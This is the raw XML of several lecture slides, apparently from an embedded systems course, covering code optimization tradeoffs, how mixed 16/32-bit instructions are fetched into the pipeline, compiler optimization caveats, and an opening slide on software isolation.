          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269587354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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tradeoffs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Optimizations that make one thing better, may make other things worse. Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>#define / inline: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for speed; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>worse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for code size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Lookup tables: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data memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Manual assembly: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Global Variables: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for speed and code size, code size, and data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Using unpacked structures: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data size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Loop unrolling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for speed; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>worse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for code size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Avoiding standard library routines: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for code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Mapping read-only data to ROM or FLASH / EEPROM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for RAM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>worse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> for ROM or FLASH / EEPROM.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1313595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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4100" smtClean="0"/>
              <a:t>Resolution of Mix 16/32-bit Instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4100" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1508125" y="2166938"/>
            <a:ext cx="3524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31</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="2209800"/>
            <a:ext cx="268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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="447675" y="2514600"/>
            <a:ext cx="1068388"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0x0000 0000</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0004</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0008</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000c</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0010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2438400"/>
            <a:ext cx="44196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2295" name="Oval 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="52578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sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="Oval 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="54864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sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Oval 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="57150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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1828800"/>
            <a:ext cx="7620000" cy="1143000"/>
            <a:chOff x="960" y="1152"/>
            <a:chExt cx="4800" cy="720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1669131" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1536"/>
              <a:ext cx="2784"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A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12325" name="Group 12"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3744" y="1152"/>
              <a:ext cx="2016" cy="528"/>
              <a:chOff x="3744" y="1152"/>
              <a:chExt cx="2016" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12326" name="Text Box 13"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1152"/>
                <a:ext cx="16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Fetch #1: Instruction A sent directly to pipeline.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:endParaRPr lang="en-US" sz="1200" b="1">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12327" name="Line 14"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3744" y="1248"/>
                <a:ext cx="28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5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2362200"/>
            <a:ext cx="7620000" cy="1143000"/>
            <a:chOff x="960" y="1488"/>
            <a:chExt cx="4800" cy="720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12319" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960"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B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12320" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2352"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C</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12321" name="Group 18"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3744" y="1488"/>
              <a:ext cx="2016" cy="633"/>
              <a:chOff x="3744" y="1488"/>
              <a:chExt cx="2016" cy="633"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12322" name="Line 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3744" y="1584"/>
                <a:ext cx="28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3" name="Rectangle 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1488"/>
                <a:ext cx="168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latin typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Fetch #2: Instruction B moved to LSW and sent to pipeline, Instruction C saved and sent to pipeline next cycle without additional memory Fetch.</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3429000"/>
            <a:ext cx="7620000" cy="822325"/>
            <a:chOff x="960" y="2160"/>
            <a:chExt cx="4800" cy="518"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12313" name="Group 22"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="2208"/>
              <a:ext cx="2784" cy="336"/>
              <a:chOff x="960" y="2208"/>
              <a:chExt cx="2784" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12317" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="960" y="2208"/>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D</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1669144" name="Rectangle 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2352" y="2208"/>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a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Instruction E (msb)</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12314" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3744" y="2160"/>
              <a:ext cx="2016" cy="518"/>
              <a:chOff x="3744" y="2160"/>
              <a:chExt cx="2016" cy="518"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12315" name="Line 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3744" y="2304"/>
                <a:ext cx="28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Rectangle 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="2160"/>
                <a:ext cx="16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#3</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>: Instruction D moved to LSW and sent to pipeline.  Instruction E saved to be married with its other half at next fetch</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="4038600"/>
            <a:ext cx="7620000" cy="1309688"/>
            <a:chOff x="960" y="2544"/>
            <a:chExt cx="4800" cy="825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12307" name="Group 29"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="2544"/>
              <a:ext cx="2784" cy="336"/>
              <a:chOff x="960" y="2544"/>
              <a:chExt cx="2784" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1669150" name="Rectangle 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="960" y="2544"/>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E (</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>lsb</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12312" name="Rectangle 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2352" y="2544"/>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dirty="0">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Instruction F</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12308" name="Group 32"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3744" y="2736"/>
              <a:ext cx="2016" cy="633"/>
              <a:chOff x="3744" y="2736"/>
              <a:chExt cx="2016" cy="633"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12309" name="Line 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3744" y="2736"/>
                <a:ext cx="288"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0" name="Rectangle 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="2736"/>
                <a:ext cx="168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#4</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>:  Instruction E made whole and sent to Pipeline. Instruction F saved and sent to pipeline next cycle without additional memory Fetch.</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="4572000"/>
            <a:ext cx="7620000" cy="1371600"/>
            <a:chOff x="960" y="2880"/>
            <a:chExt cx="4800" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1669156" name="Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="2880"/>
              <a:ext cx="2784"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G</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12304" name="Group 37"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3744" y="3072"/>
              <a:ext cx="2016" cy="672"/>
              <a:chOff x="3744" y="3072"/>
              <a:chExt cx="2016" cy="672"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12305" name="Line 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3744" y="3072"/>
                <a:ext cx="28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Rectangle 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="3456"/>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#5</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>:  Instruction G sent directly to pipeline</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289796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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compiler Optimizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Impossible to predict what will happen the first time that compiler optimization is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example: -O3 turns on all available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> optimizations, regardless of tradeoff effects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compiler uses heuristics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>in some cases size optimizations may result in actually larger code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="00CCFF"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When you change the compiler flags, check and retest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255559199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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation refers to the ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>some software on the system to access system resources that “belongs” to other software in the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why do we need isolation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
